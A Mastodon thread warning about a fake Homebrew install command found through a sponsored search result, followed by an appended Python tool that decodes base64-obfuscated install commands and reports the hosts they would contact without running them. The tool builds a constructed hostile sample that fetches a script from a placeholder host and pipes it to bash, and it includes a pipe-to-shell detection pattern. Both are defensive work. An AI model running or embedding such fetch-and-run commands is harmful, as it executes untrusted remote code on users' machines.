You're viewing the mastodonapp.uk public feed.
  • Will Harris (will_harris)
    Nov 11, 2025, 11:57 AM

    Advice to fellow computer-touchers: distrust those install commands you're supposed to copy-paste into your terminal from websites.

    Google's first result when I searched for homebrew (Mac OS package manager) was a sponsored result for a phishing attempt hosted on Google Drive. The so-called install command would fetch and run a bash script that would itself fetch and run a very shady-looking executable payload.

    Screenshot of a Google search result page for the term "homebrew" showing a phishing attempt in the first (sponsored) result above the genuine page.
    Screenshot from a fake Homebrew homepage showing a dodgy install command obfuscated by base64 encoding. I have painted over some of the base64 cipher text in red and added a label that says "NO!".

Replies

  • Will Harris (will_harris)
    Nov 11, 2025, 12:06 PM

    Looking at the disassembly, I think the binary payload would run some mysterious shell commands. They're mysterious because (1) I'm not a security expert so I don't know how to reverse engineer the obfuscation/encryption and also because (2) I'm not a maniac so I won't just run the thing.

  • Will Harris (will_harris)
    Nov 11, 2025, 12:13 PM

    Obviously I reported the ad already. I expect to hear back that "We found that the ad doesn’t go against Google’s policies" in the next couple of days.

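
The thread describes an install command that hides its real content behind base64 and then fetches and runs a script. The following is an added example, not part of the original posts: a static check that decodes such a command without executing it and reports which hosts it would contact. The sample command, the `EXPECTED_HOSTS` allow-list and the function names are assumptions made for illustration.

```python
import base64
import binascii
import re
from urllib.parse import urlparse

# Assumption: host a genuine Homebrew install command fetches from.
EXPECTED_HOSTS = {"raw.githubusercontent.com"}

B64_RUN = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")
URL = re.compile(r"https?://[^\s'\"|)]+")
PIPE_TO_SHELL = re.compile(r"\|\s*(?:sudo\s+)?(?:/bin/)?(?:ba|z)?sh\b")

def decode_layers(text, max_depth=3):
    """Return text followed by each readable base64 layer hidden in it. Nothing is executed."""
    layers = [text]
    for _ in range(max_depth):
        found = []
        for blob in B64_RUN.findall(layers[-1]):
            try:
                decoded = base64.b64decode(blob, validate=True).decode("utf-8")
            except (binascii.Error, UnicodeDecodeError):
                continue  # not base64 text, e.g. a long URL path
            if all(c.isprintable() or c.isspace() for c in decoded):
                found.append(decoded)
        if not found:
            break
        layers.append("\n".join(found))
    return layers

def inspect_command(cmd):
    """Summarise what a pasted install command would fetch and run."""
    layers = decode_layers(cmd)
    joined = "\n".join(layers)
    hosts = sorted({urlparse(u).hostname for u in URL.findall(joined)} - {None})
    return {
        "hidden_layers": layers[1:],
        "hosts": hosts,
        "unexpected_hosts": [h for h in hosts if h not in EXPECTED_HOSTS],
        "pipes_to_shell": bool(PIPE_TO_SHELL.search(joined)),
    }

# Constructed sample, not the command from the screenshot; .invalid never resolves.
HIDDEN = "curl -fsSL https://files.example.invalid/install.sh | bash"
SAMPLE = "/bin/bash -c \"$(echo '%s' | base64 -d)\"" % base64.b64encode(HIDDEN.encode()).decode()
# Homebrew's documented one-line installer, for contrast.
GENUINE = '/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"'

if __name__ == "__main__":
    for name, cmd in (("sample", SAMPLE), ("genuine", GENUINE)):
        print(name, inspect_command(cmd))
```

Both commands run whatever they download; the check only surfaces the hidden layer and the unexpected host, so the fetched script still needs reading before it is run.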